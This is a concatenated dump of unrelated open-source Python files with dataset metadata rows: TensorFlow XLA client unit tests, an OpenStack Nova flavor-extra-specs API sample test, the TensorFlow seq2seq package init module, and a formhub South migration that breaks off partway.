c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
# TODO(b/72689392): re-enable when bug S32 resolved
def DISABLED_testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
    self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
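    # Takes a 2x2 slice whose start indices (row 1, column 0) come from the
    # second operand.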
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
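    # Writes the 2x2 update block into the operand starting at indices (1, 1).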
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = c.Build().Compile().Execute()
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(c.Constant(NumpyArrayF32(0.)), c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = c.Build().Compile().Execute()
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayF32(lo)), c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = c.Build().Compile().Execute()
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayS32(lo)), c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = c.Build().Compile().Execute()
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
class EmbeddedComputationsTest(LocalComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
    c = self._NewComputation("param0_ge_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
    c = self._NewComputation("param0_ge_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
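    # For each 2x1 window the select computation (>=) picks the larger
    # element, and the matching source value is scattered (added) onto an
    # output filled with init_value.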
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
    _ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
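    # The body doubles the value while the condition (value < 10) holds:
    # 1 -> 2 -> 4 -> 8 -> 16.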
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
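    # Each execution consumes one value from the infeed queue, in the order
    # the values were transferred.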
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.Infeed(xla_client.Shape.from_pyval(to_infeed[0]))
compiled_c = c.Build().CompileWithExampleArguments()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = compiled_c.Execute()
self.assertEqual(result, item)
def testInfeedThenOutfeedS32(self):
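    # Execute() blocks until the outfeed is drained, so each execution runs
    # on a helper thread while this thread feeds the infeed and reads the
    # outfeed.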
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x = c.Infeed(xla_client.Shape.from_pyval(to_round_trip[0]))
c.Outfeed(x)
compiled_c = c.Build().CompileWithExampleArguments()
for want in to_round_trip:
execution = threading.Thread(target=compiled_c.Execute)
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.Shape.from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
class ErrorTest(LocalComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
self.assertRaisesRegexp(
RuntimeError, r"Invalid argument shape.*xla_client_test.py.*"
r"expected s32\[\], got f32\[\]",
lambda: c.Build().CompileWithExampleArguments([self.f32_scalar_2]))
if __name__ == "__main__":
unittest.main()
| apache-2.0 | -1,995,081,424,407,314,200 | 37.470154 | 80 | 0.625028 | false |
mahak/nova | nova/tests/functional/api_sample_tests/test_flavor_extraspecs.py | 4 | 2640 | # Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.tests.functional.api_sample_tests import api_sample_base
class FlavorExtraSpecsSampleJsonTests(api_sample_base.ApiSampleTestBaseV21):
ADMIN_API = True
sample_dir = 'flavor-extra-specs'
def _flavor_extra_specs_create(self):
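        # Creates extra specs on flavor 1 and verifies the response against
        # the API sample.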
subs = {
'value1': 'shared',
'value2': '1',
}
response = self._do_post('flavors/1/os-extra_specs',
'flavor-extra-specs-create-req', subs)
self._verify_response('flavor-extra-specs-create-resp',
subs, response, 200)
def test_flavor_extra_specs_get(self):
subs = {
'value1': '1',
}
self._flavor_extra_specs_create()
response = self._do_get('flavors/1/os-extra_specs/hw:numa_nodes')
self._verify_response('flavor-extra-specs-get-resp',
subs, response, 200)
def test_flavor_extra_specs_list(self):
subs = {
'value1': 'shared',
'value2': '1',
}
self._flavor_extra_specs_create()
response = self._do_get('flavors/1/os-extra_specs')
self._verify_response('flavor-extra-specs-list-resp',
subs, response, 200)
def test_flavor_extra_specs_create(self):
self._flavor_extra_specs_create()
def test_flavor_extra_specs_update(self):
subs = {
'value1': '2',
}
self._flavor_extra_specs_create()
response = self._do_put('flavors/1/os-extra_specs/hw:numa_nodes',
'flavor-extra-specs-update-req', subs)
self._verify_response('flavor-extra-specs-update-resp',
subs, response, 200)
def test_flavor_extra_specs_delete(self):
self._flavor_extra_specs_create()
response = self._do_delete('flavors/1/os-extra_specs/hw:numa_nodes')
self.assertEqual(200, response.status_code)
self.assertEqual('', response.text)
| apache-2.0 | 5,747,813,114,677,206,000 | 37.26087 | 78 | 0.598864 | false |
manazhao/tf_recsys | tensorflow/contrib/seq2seq/__init__.py | 15 | 2363 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops for building neural network seq2seq decoders and losses.
See the @{$python/contrib.seq2seq} guide.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,wildcard-import,line-too-long
from tensorflow.contrib.seq2seq.python.ops.attention_wrapper import *
from tensorflow.contrib.seq2seq.python.ops.basic_decoder import *
from tensorflow.contrib.seq2seq.python.ops.beam_search_decoder import *
from tensorflow.contrib.seq2seq.python.ops.beam_search_ops import *
from tensorflow.contrib.seq2seq.python.ops.decoder import *
from tensorflow.contrib.seq2seq.python.ops.helper import *
from tensorflow.contrib.seq2seq.python.ops.loss import *
from tensorflow.python.util.all_util import remove_undocumented
# pylint: enable=unused-import,wildcard-import,line-too-long
_allowed_symbols = [
"sequence_loss",
"Decoder",
"dynamic_decode",
"BasicDecoder",
"BasicDecoderOutput",
"BeamSearchDecoder",
"BeamSearchDecoderOutput",
"BeamSearchDecoderState",
"Helper",
"CustomHelper",
"FinalBeamSearchDecoderOutput",
"gather_tree",
"GreedyEmbeddingHelper",
"SampleEmbeddingHelper",
"ScheduledEmbeddingTrainingHelper",
"ScheduledOutputTrainingHelper",
"TrainingHelper",
"BahdanauAttention",
"LuongAttention",
"hardmax",
"AttentionWrapperState",
"AttentionWrapper",
"AttentionMechanism",
"tile_batch",
"safe_cumprod",
"monotonic_attention",
"monotonic_probability_fn",
"BahdanauMonotonicAttention",
"LuongMonotonicAttention",
]
remove_undocumented(__name__, _allowed_symbols)
| apache-2.0 | 5,054,603,284,321,872,000 | 33.246377 | 80 | 0.723233 | false |
ehealthafrica-ci/formhub | odk_logger/migrations/0015_auto__add_field_xform_is_crowd_form.py | 7 | 7432 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'XForm.is_crowd_form'
db.add_column('odk_logger_xform', 'is_crowd_form', self.gf('django.db.models.fields.BooleanField')(default=False), keep_default=False)
def backwards(self, orm):
# Deleting field 'XForm.is_crowd_form'
db.delete_column('odk_logger_xform', 'is_crowd_form')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
